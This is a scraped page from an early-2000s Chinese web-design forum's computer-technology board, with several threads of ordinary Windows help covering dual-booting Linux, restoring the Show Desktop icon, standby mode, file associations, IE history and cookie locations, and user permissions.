张无忌 win1st 管理员 积分：7148 发帖：3108 来自：Blueidea.com 注册：2000-09-10 | 发表于 2001-12-16 15:08:07 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP 终极密招：新建一个用户，删掉当前用户！ 只用一样东西，不明白它的道理，实在不高明 Blueidea Web Team Team Member
上一贴 | 下一贴
快速回复 | 主题：在xp里，我一开电脑就自动上网。我不想这样，怎算？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


winme与Xteam linux并存？

计算机技术
winme与Xteam linux并存？

上一贴 | 下一贴
发表人 主题: winme与Xteam linux并存？
gen2

初级用户
积分：10
发帖：5
来自：
注册：2001-11-16
 发表于 2001-11-28 10:13:39 按此观看gen2的个人资料 按此发邮件给gen2 收藏该主题供以后查看 发送悄悄话给gen2 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看gen2的IP
我在原来装有winme的电脑上装Xteam linux 4.0标准版，装到一半的提示我预分的空间不够于是我重启进入WINME，打开PQ6.0（分区大师）后却出现：partition's drive letter cannot be identified!
linux swap 分区和 /boot分区都建在主分区上，/建在逻辑分区上（1024柱面）以后.
重启后可以进入linux启动选择画面，但是选择进入linux后却出现黑屏现象，选择DOS可以进入WINME。
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-28 10:28:07 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
linux 加载出错你安装的问题~ 重新规划分区 重装 像redhat7以上的图形化安装里面直接有对硬盘分区划分的~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

gen2

初级用户
积分：10
发帖：5
来自：
注册：2001-11-16
 发表于 2001-11-28 10:52:33 按此观看gen2的个人资料 按此发邮件给gen2 发送悄悄话给gen2 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看gen2的IP
你说重新规划分区,但是我对fdisk不太熟悉，PQ又用不起来，请问有什么好的办法吗？
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-28 10:55:37 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
gen2在上个帖子中说
引用:
你说重新规划分区,但是我对fdisk不太熟悉，PQ又用不起来，请问有什么好的办法吗？

http://www6.163.com/it/item/0,2186,1693,00.html

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

gen2

初级用户
积分：10
发帖：5
来自：
注册：2001-11-16
 发表于 2001-11-28 11:05:54 按此观看gen2的个人资料 按此发邮件给gen2 发送悄悄话给gen2 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看gen2的IP
Thanks !
嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2001-11-28 18:08:25 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
装pq7.0吧，可以直接在windows里面进行分区，很方便的。

另：你装linux的时候没做启动盘吗，如果做了可以试一下用它来启动，如果能进的话再运行一遍lilo命令，小问题问题应该能解决。

缘是天定,份在人为.
gen2

初级用户
积分：10
发帖：5
来自：
注册：2001-11-16
 发表于 2001-12-01 13:06:39 按此观看gen2的个人资料 按此发邮件给gen2 发送悄悄话给gen2 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看gen2的IP
请问partition's drive letter cannot be identified!是何原因造成的？
上一贴 | 下一贴
快速回复 | 主题：winme与Xteam linux并存？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


如何完全的把windows改成mac？

计算机技术
如何完全的把windows改成mac？

上一贴 | 下一贴
发表人 | 主题: 如何完全的把windows改成mac？
sunnyleo 高级用户 积分：183 发帖：217 来自：大连 注册：2001-05-13 | 发表于 2001-12-17 18:30:59 按此观看sunnyleo的个人资料 该用户不允许显示它的电子邮件 访问sunnyleo的主页 sunnyleo 的 oicq 是64124700,查看 64124700 的资料 收藏该主题供以后查看 发送悄悄话给sunnyleo 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sunnyleo的IP 很多单位都要会mac的，我没用过，但有些软件可以把win的界面改成mac，比如把ctrl等建也改了，而且鼠标也只有单击，哪种软件比较好，哪里可以下载呢？？？ 现实一种，没有虚构，没有幻想，真实人生...
赵鹏 初级用户 积分：9 发帖：1191 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-17 18:53:00 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP 有这种模拟器 但是只能够模拟MAC OS 8.1 或更早版本的MAC 最著名的模拟软件称作 BasiliskII 你需要的是一个MAC的BIOS影像文件 MAC启动盘影像文件 和一张MAC OS系统安装光盘 下列地址可能可以帮助你 http://www.kearney.net/~mhoffman/ http://fusion.inhk.net/ http://www.delphi.com/n/main.asp?webtag=macemulation&nav=messages&msg=1451.1 http://www.kearney.net/~mhoffman/basiliskII/system753_tutorial/ http://www.emaculation.com/ http://mes.emuunlim.com/mes/index.htm 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
sunnyleo 高级用户 积分：183 发帖：217 来自：大连 注册：2001-05-13 | 发表于 2001-12-17 20:34:05 按此观看sunnyleo的个人资料 该用户不允许显示它的电子邮件 访问sunnyleo的主页 sunnyleo 的 oicq 是64124700,查看 64124700 的资料 发送悄悄话给sunnyleo 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sunnyleo的IP 谢谢啊！！！但我记得原来有个软件是把win界面改成mac或者其他操作系统的，叫什么名忘了，不知道谁能告诉一下，哪儿可以下载？谢了！ 现实一种，没有虚构，没有幻想，真实人生...
赵鹏 初级用户 积分：9 发帖：1191 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-17 22:53:55 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP WindowBlind http://www.stardock.com 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
sunnyleo 高级用户 积分：183 发帖：217 来自：大连 注册：2001-05-13 | 发表于 2001-12-18 21:31:50 按此观看sunnyleo的个人资料 该用户不允许显示它的电子邮件 访问sunnyleo的主页 sunnyleo 的 oicq 是64124700,查看 64124700 的资料 发送悄悄话给sunnyleo 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sunnyleo的IP 赵兄，谢了！ 现实一种，没有虚构，没有幻想，真实人生...
上一贴 | 下一贴
快速回复 | 主题：如何完全的把windows改成mac？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


"显示桌面"不见了

计算机技术
"显示桌面"不见了

上一贴 | 下一贴
发表人 主题: "显示桌面"不见了
jill

终级用户
积分：575
发帖：175
来自：沈阳市
注册：2001-12-10
 发表于 2001-12-19 17:31:55 按此观看jill的个人资料 按此发邮件给jill jill 的 oicq 是33475686,查看 33475686 的资料 收藏该主题供以后查看 发送悄悄话给jill 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jill的IP
win2000左下角的快速启动栏"显示桌面"不见了，请问怎么办，我找不回来了！：

誓与WIN2000共存
alphalee

初级用户
积分：62
发帖：22
来自：北京
注册：2001-12-19
 发表于 2001-12-19 18:44:29 按此观看alphalee的个人资料 按此发邮件给alphalee 访问alphalee的主页 alphalee 的 oicq 是18776996,查看 18776996 的资料 发送悄悄话给alphalee 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看alphalee的IP
右键单击“任务栏”，选择“工具栏”——“快速启动”

我的《日记本子》
http://www.diary365.net/book/choose.asp?author=liyue
青春是个普通的名称，它是幸福美好的，但它也充满着艰苦的磨炼！
赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-12-19 19:03:44 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
快捷键Win D一样

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-19 20:05:07 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
简单！
再新建个用户，然后去信用户的目录下面把显示桌面copy过来，然后删除用户，解决！

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-12-19 23:51:16 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
你就会删除用户啊

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-20 00:58:01 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
赵鹏在上个帖子中说
引用:
你就会删除用户啊

这种终极招数，你哪里懂得其中方便！

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2001-12-20 10:18:14 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
用“桌面”这个关键词来搜索windows的目录，应该是可以找出来的，然后发送一个快捷方式到桌面上，再拖到快速启动栏里就行了。

缘是天定,份在人为.
BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-12-20 13:59:27 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch

右键“显示桌面”，发送快捷方式

等我想想再签
天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2001-12-20 19:18:30 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
C:\WINDOWS\Application Data\Mi...\Quick Launch
它藏在这里呢

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2001-12-20 19:28:08 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop

把上面的文字用记事本存为(显示桌面.scf)
－－－－－－－－－－－－－－－－－－

图标文件可以从0到10
[Shell]
Command=2
IconFile=explorer.exe,1

[Taskbar]
Command=Explorer
是Explorer的代码
－－－－－－－－－－－－－
欢迎光临我的网页－windows学习http://www.51windows.com

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

上一贴 | 下一贴
快速回复 | 主题："显示桌面"不见了
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


郁闷，关于xp

计算机技术
郁闷，关于xp

上一贴 | 下一贴
发表人 | 主题: 郁闷，关于xp
wangzha 初级用户 积分：145 发帖：146 来自： 注册：2001-01-02 | 发表于 2001-12-20 00:51:01 按此观看wangzha的个人资料 按此发邮件给wangzha 访问wangzha的主页 收藏该主题供以后查看 发送悄悄话给wangzha 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangzha的IP 不知xp 中关于待机在press键盘上的休眠键后，却只有休眠[即保存当前工作状态的整个桌面]，但这样，每次都需要重新启动，不知如何能调试出待机[即只暂时节电，但 wakeup后能继续工作]的功能，这点这几日郁闷了些，不知有谁已经知道解决方法，盼回复 永远未完成... SF.creative
poorfish 经典圣僧 现任版主 积分：10941 发帖：3503 来自：江西萍乡 注册：2000-12-04 | 发表于 2001-12-20 08:53:57 按此观看poorfish的个人资料 按此发邮件给poorfish 访问poorfish的主页 poorfish 的 oicq 是1525464,查看 1525464 的资料 发送悄悄话给poorfish 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看poorfish的IP ctrl+alt+del 菜单>>关机>>待机 【DW版常见问题解答】【破废墟】 Blueidea Web Team Moderator of DW & JS Forum
51windows 海娃 积分：2284 发帖：682 来自：湖南－山东 注册：2001-12-02 | 发表于 2001-12-20 20:14:07 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP 在关机的选项里，选择等待就行了，就是待机了 Blueidea Web Team. Moderator Of Amphitheater Forum .::天天学习:好好向上::. www.51windows.com 系统出问题了?请看！
上一贴 | 下一贴
快速回复 | 主题：郁闷，关于xp
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


没次开机器空的回收站都显示满：（怎么改好？

计算机技术
没次开机器空的回收站都显示满：（怎么改好？

上一贴 | 下一贴
发表人 主题: 没次开机器空的回收站都显示满：（怎么改好？
uh

终级用户
积分：597
发帖：188
来自：LIAONING
注册：2000-12-25
 发表于 2001-12-28 08:23:09 按此观看uh的个人资料 按此发邮件给uh uh 的 oicq 是19732312,查看 19732312 的资料 收藏该主题供以后查看 发送悄悄话给uh 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看uh的IP
up

随意,随意
呵呵
gate

初级用户
积分：22
发帖：25
来自：浙江
注册：2001-10-30
 发表于 2001-12-28 10:25:11 按此观看gate的个人资料 按此发邮件给gate 发送悄悄话给gate 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看gate的IP
你清空了吗？

享受每一天！
wangfeng

高级用户
积分：280
发帖：91
来自：辽宁
注册：2001-12-23
 发表于 2001-12-28 11:16:49 按此观看wangfeng的个人资料 按此发邮件给wangfeng 访问wangfeng的主页 wangfeng 的 oicq 是56202481,查看 56202481 的资料 发送悄悄话给wangfeng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangfeng的IP
uh是我的朋友 其实是我的机器出的问题

回收站显示是满的 但是进入后没有任何文件 也没有隐藏文件

清空后也是一样

我曾经问个不休？……？
gate

初级用户
积分：22
发帖：25
来自：浙江
注册：2001-10-30
 发表于 2001-12-29 14:38:04 按此观看gate的个人资料 按此发邮件给gate 发送悄悄话给gate 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看gate的IP
你的图标是不是修改过了啊？

享受每一天！
wangfeng

高级用户
积分：280
发帖：91
来自：辽宁
注册：2001-12-23
 发表于 2001-12-29 18:06:34 按此观看wangfeng的个人资料 按此发邮件给wangfeng 访问wangfeng的主页 wangfeng 的 oicq 是56202481,查看 56202481 的资料 发送悄悄话给wangfeng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangfeng的IP
图标重新改过 也不可以

问题我已经解决了 就是随便找个什么东西扔到回收站里面 然后清空

但是 还想请教一下原理

我曾经问个不休？……？
赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-12-29 20:07:00 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
这样的情况很多见了

就是那样解决就好了

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-12-29 20:19:27 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
wangfeng在上个帖子中说
引用:
uh是我的朋友 其实是我的机器出的问题

回收站显示是满的 但是进入后没有任何文件 也没有隐藏文件

清空后也是一样

很正常拉！是不是WIN98呀！

^^
上一贴 | 下一贴
快速回复 | 主题：没次开机器空的回收站都显示满：（怎么改好？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


win2000的IE历史文件列表都放在哪里？

计算机技术
win2000的IE历史文件列表都放在哪里？

上一贴 | 下一贴
发表人 | 主题: win2000的IE历史文件列表都放在哪里？
cheng 初级用户 积分：46 发帖：16 来自：辽宁锦州 注册：2001-12-20 | 发表于 2001-12-29 15:18:42 按此观看cheng的个人资料 该用户不允许显示它的电子邮件 cheng 的 oicq 是3181247,查看 3181247 的资料 收藏该主题供以后查看 发送悄悄话给cheng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cheng的IP win2000的IE历史文件列表都放在哪里？ cola
POPOEVER N个蓝色大泡泡 版主 积分：19175 发帖：5030 来自：Keyframe G.L 注册：2000-07-17 | 发表于 2001-12-29 15:48:09 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files XTree 无可救药地活着，睡眼朦胧地醒着 Blueidea Web Team Moderator Of DW & JS Forum Chief Police Officer
51windows 海娃 积分：2284 发帖：682 来自：湖南－山东 注册：2001-12-02 | 发表于 2001-12-30 01:25:55 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP 历史文件列表 D:系统盘\Documents and Settings\haiwa（用户名）\Local Settings Blueidea Web Team. Moderator Of Amphitheater Forum .::天天学习:好好向上::. www.51windows.com 系统出问题了?请看！
上一贴 | 下一贴
快速回复 | 主题：win2000的IE历史文件列表都放在哪里？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


紧急求助啊！为什么我的电脑不能打开文本文件啊？

计算机技术
紧急求助啊！为什么我的电脑不能打开文本文件啊？

上一贴 | 下一贴
发表人 | 主题: 紧急求助啊！为什么我的电脑不能打开文本文件啊？
下雨了 初级用户 积分：0 发帖：5 来自：广东 注册：2002-01-05 | 发表于 2002-01-05 17:26:54 按此观看下雨了的个人资料 该用户不允许显示它的电子邮件 下雨了 的 oicq 是5612802,查看 5612802 的资料 收藏该主题供以后查看 发送悄悄话给下雨了 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看下雨了的IP 当我想打开”文本文档“类型的文件时，系统就会提示说“windows无法找到rnudll32.exe。该程序用于打开“文本文档”类型的文件“。 请问各位高手这要怎么办啊？？？怎么样才能重新恢复到能打开“文本文档”类型的文件呢？？？紧急求助啊！！！ 在此先谢谢大家了！ [img]http://raulsky.51.net/raul.jpg[/img]
ADSL 终级用户 积分：2969 发帖：668 来自：贫困山区 注册：2001-03-06 | 发表于 2002-01-05 19:32:18 按此观看ADSL的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给ADSL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ADSL的IP 按住shift键右击文本文件,打开方式选写字板试试 好好学习，努力做事
下雨了 初级用户 积分：0 发帖：5 来自：广东 注册：2002-01-05 | 发表于 2002-01-05 19:57:54 按此观看下雨了的个人资料 该用户不允许显示它的电子邮件 下雨了 的 oicq 是5612802,查看 5612802 的资料 发送悄悄话给下雨了 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看下雨了的IP 如果不行的话，要怎么样才能恢复到像之前一样可以直接打开文本啊？？？ [img]http://raulsky.51.net/raul.jpg[/img]
2smile 活着就好 积分：1622 发帖：1907 来自：SD 注册：2001-05-13 | 发表于 2002-01-06 00:49:27 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP 工具/文件夹选项/文件类弄/找到txt文件，编辑打开方式，选择计事本 想见不如怀念? thinktip.com msn: thinktip@hotmail.com icq: 98885338
下雨了 初级用户 积分：0 发帖：5 来自：广东 注册：2002-01-05 | 发表于 2002-01-06 08:27:02 按此观看下雨了的个人资料 该用户不允许显示它的电子邮件 下雨了 的 oicq 是5612802,查看 5612802 的资料 发送悄悄话给下雨了 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看下雨了的IP 非常谢谢上面两位朋友的指导,这个难题我已经解决了！ 真的是很感谢你们！ [img]http://raulsky.51.net/raul.jpg[/img]
上一贴 | 下一贴
快速回复 | 主题：紧急求助啊！为什么我的电脑不能打开文本文件啊？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


在Win2K或XP里，如何赋予Guest或PowerUser

计算机技术
在Win2K或XP里，如何赋予Guest或PowerUser

上一贴 | 下一贴
发表人 | 主题: 在Win2K或XP里，如何赋予Guest或PowerUser
cmosbjt 初级用户 积分：0 发帖：1 来自： 注册：2002-01-02 | 发表于 2002-01-07 20:38:29 按此观看cmosbjt的个人资料 按此发邮件给cmosbjt 收藏该主题供以后查看 发送悄悄话给cmosbjt 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cmosbjt的IP 请问在那里设置？ 谢谢
秋天的小乐 终级用户 积分：806 发帖：456 来自：京西 注册：2000-11-13 | 发表于 2002-01-08 10:24:22 按此观看秋天的小乐的个人资料 按此发邮件给秋天的小乐 访问秋天的小乐的主页 秋天的小乐 的 oicq 是7545653,查看 7545653 的资料 发送悄悄话给秋天的小乐 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看秋天的小乐的IP 2000的在计算机管理中的用户中。由于guest这个用户很特殊，它的每个windows2000中都有个用户名，密码也是不变的，所以默认时都是被关闭的。这样对你的windows是一种保护。建议你不要打开它！ 老婆被泡，马子被翘，脏款被盗，让汽车撞出人行道。 OICQ-7545653
风梦扬 超级用户 积分：331 发帖：125 来自：广州 注册：2000-10-21 | 发表于 2002-01-08 19:59:57 按此观看风梦扬的个人资料 按此发邮件给风梦扬 访问风梦扬的主页 风梦扬 的 oicq 是110681,查看 110681 的资料 发送悄悄话给风梦扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风梦扬的IP 控制面板--管理工具--计算机管理 华语互联直播立体台 -- Yuner.com(.cn) 全球华人目标生活多维媒质. 想和NJ们互动么?也欢迎各位一起来参与我们的节目! 进入 "QQ聊天室 -- 网络社团 -- 华语互联网络直播" 一起来互联你我吧.
HowCoffee 初级用户 积分：0 发帖：6 来自： 注册：2002-01-02 | 发表于 2002-01-08 20:51:27 按此观看HowCoffee的个人资料 按此发邮件给HowCoffee 访问HowCoffee的主页 发送悄悄话给HowCoffee 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看HowCoffee的IP 也可以重新建立一个组并赋予这个组一定的权限 :::cOFFEE dESIGN:::
上一贴 | 下一贴
快速回复 | 主题：在Win2K或XP里，如何赋予Guest或PowerUser
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


NT2000下怎么打开COOKIE选项呀

计算机技术
NT2000下怎么打开COOKIE选项呀

上一贴 | 下一贴
发表人 | 主题: NT2000下怎么打开COOKIE选项呀
Rocking 初级用户 积分：108 发帖：28 来自： 注册：2001-11-14 | 发表于 2002-01-03 23:28:31 按此观看Rocking的个人资料 按此发邮件给Rocking 收藏该主题供以后查看 发送悄悄话给Rocking 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Rocking的IP 我在IE INTERNET 选项怎么找不到呀
BIGBUG 终级用户 积分：1095 发帖：720 来自：不一定 注册：2001-03-21 | 发表于 2002-01-04 18:09:47 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP 开始——搜索 后面不用教了吧 一般在C:\Documents and Settings\你的用户名\Cookies 等我想想再签
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2002-01-05 08:41:10 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 工具----〉选项-----〉隐私 A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
上一贴 | 下一贴
